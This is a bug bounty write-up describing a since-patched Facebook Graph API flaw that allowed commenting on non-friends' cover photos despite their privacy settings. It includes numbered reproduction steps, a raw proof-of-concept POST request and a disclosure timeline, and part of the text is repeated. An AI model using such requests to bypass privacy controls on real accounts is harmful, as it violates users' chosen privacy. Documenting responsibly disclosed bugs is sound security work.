Hello guys,
It’s My First Writeup so first let me introduce my self to you guys.I am Asadul(16)from Dhaka, Bangladesh.Last month I found a privacy bug on Facebook.The Bug is Commenting On non-friends cover photo using GRAPH API.Through the bug, an attacker could have commented on non-friends cover photo even after the victim has set his "Public Info" to "Friends".
Steps to reproduce:
1: First grab the cover photo ID.
2: Now go to GRAPH API EXPLORER(developers.facebook.com/tools/explorer/)
3: Get your access token.
4: Now make a post request using below
Reference:https://developers.facebook.com/docs/graph-api/reference/object/comments
This is how mine one looked like:
Wednesday,May 11,2017 at 12:24am:$500 rewarded ☺
I would like to thanks, ALMIGHTY ALLAH π
Also my family and friends π
Special thanks to Rohan Das and Philippe Harewood π
Stay tuned I'll post another finding of mine :)
It’s My First Writeup so first let me introduce my self to you guys.I am Asadul(16)from Dhaka, Bangladesh.Last month I found a privacy bug on Facebook.The Bug is Commenting On non-friends cover photo using GRAPH API.Through the bug, an attacker could have commented on non-friends cover photo even after the victim has set his "Public Info" to "Friends".
Steps to reproduce:
1: First grab the cover photo ID.
2: Now go to GRAPH API EXPLORER(developers.facebook.com/tools/explorer/)
3: Get your access token.
4: Now make a post request using below
Reference:https://developers.facebook.com/docs/graph-api/reference/object/comments
This is how mine one looked like:
POST /v2.9/,PHOTO ID>/comments?access_token=<*****************************> HTTP/1.1
Host: graph.facebook.com
Connection: close
Content-Length: 76
Origin: https://developers.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Referer: https://developers.facebook.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
debug=all&format=json&message=<YOUR COMMENT>&method=post&pretty=0&suppress_http_code=1
Now you'll get a response with comment ID π
That's all!You're DONE!
Timeline:
Monday, April 10, 2017, at 4:05pm: Report Sent
Monday, April 10, 2017 at 10:40pm: PoC Sent.
Tuesday, April 18, 2017, at 3:38am: Triaged
Tuesday, May 10,2017 at 12:59am: Patched
Tuesday, May 10, 2017, at 1:19am: Fix confirmed.
I would like to thanks, ALMIGHTY ALLAH π
Also my family and friends π
Special thanks to Rohan Das and Philippe Harewood π
Stay tuned I'll post another finding of mine :)
Comments
Post a Comment